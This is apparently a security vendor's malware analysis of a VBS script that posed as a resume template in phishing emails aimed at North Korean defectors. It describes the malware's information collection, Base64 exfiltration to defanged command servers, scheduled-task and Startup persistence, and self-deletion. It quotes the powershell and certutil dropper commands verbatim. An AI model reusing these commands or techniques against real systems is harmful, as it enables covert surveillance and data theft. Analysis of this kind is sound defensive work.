APT Attack Disguised as Resume Template for North Korean Defectors (VBS Script)

The ASEC analysis team has recently discovered that a malicious info-leaking VBS is being distributed via phishing email disguised as North Korea-related material. The email is about casting calls for a North Korea-related broadcast, and a compressed file is attached to it. It asks the readers to fill out the resume, prompting them to run the file. The compressed file contains a malicious VBS script file.

Figure 1. Distributed email
Figure 2. Attached compressed file

The activities of ‘2022 Resume Template.vbs’ are as follows:

  • Collects and sends information
  • Creates a normal HWP file
  • Creates additional malicious script files and registers to task scheduler

When the VBS file is run, it collects user PC information using the commands below.

Collected InformationCommand
List of currently running processescmd /c tasklist /v | clip
Routing table informationcmd /c Route print | clip
Program Files folder informationcmd /c dir /w “”%SystemRoot%/../Program Files”” | clip
Program Files (x86) folder informationcmd /c dir /w “”%SystemRoot%/../Program Files (x86)”” | clip
Table 1. Collected Information

It then encodes the collected information with Base64 and sends it to hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php.

  • Parameter value: Cache=error&Sand=[Username]&Data=[Collected information encoded with base64]&Em=[Username encoded with base64]

It also uses ‘2022.hwp’ command to run the HWP file created in the folder where ‘2022 Resume Template.vbs’ file was run to disguise it as a normal file. The HWP file contains a resume template as shown below.

Figure 3. Inside HWP file
Figure 4. Properties of HWP file

It then uses powershell to run the data existing in the response received from the URL the information was sent to. It also registers %appdata%\mscornet.vbs file that was created from the response to task scheduler as Google Update Source Link. Furthermore, it copies mscornet.vbs to the Startup folder so that the VBS file can be run automatically, then self-deletes ‘2022 Resume Template.vbs.’

Figure 5. Created task scheduler

Although no special responses can currently be received from hxxp://fserverone.webcindario[.]com/contri/sqlite/msgbugPlog.php (the destination of sent information), additional commands exist in the received response recorded in AhnLab’s automatic analysis system RAPIT (Confirmed on March 26th).

In the response message, it uses powershell to save the data encoded with base64 in %AppData%\~KB3241.tmp. It then decodes ~Kb3241.tmp to save it as %AppData%\mscornet.vbs and deletes ~KB3241.tmp.

powershell -w hidden ECHO OFF echo RnVuY3Rpb24gaDJzKGgpDQogIERpbSBhIDogYSA9IFNwbGl0KGgpDQogIERpbSBp > "%AppData%\~KB3241.tmp" 
echo DQogIEZvciBpID0gMCBUbyBVQm91bmQoYSkNCiAgICAgIGEoaSkgPSBDaHIoIiYi >> "%AppData%\~KB3241.tmp" 
echo ZSINCmtpbGxQcm9jZXNzICJpZWxvd3V0aWwuZXhlIg== >> "%AppData%\~KB3241.tmp" 
certutil -f -decode "%AppData%\~KB3241.tmp" "%AppData%\mscornet.vbs" 
del "%AppData%\~KB3241.tmp"

mscornet.vbs accesses hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/msgbugGlog.php?Cache=fail&Sand=[PC name] and runs the received response with Execute command. No additional commands can be seen from the URL, but it can be made to perform various malicious behaviors by the attacker.

Users must remain vigilant as malware disguised with North Korea-related materials are recently being distributed via Word files as well as in the form of VBS script.

AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.

[File Detection]

hxxp://cmaildowninvoice.webcindario[.]com/contri/sqlite/ msgbugGlog.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:

0 0 votes
Article Rating
Inline Feedbacks
View all comments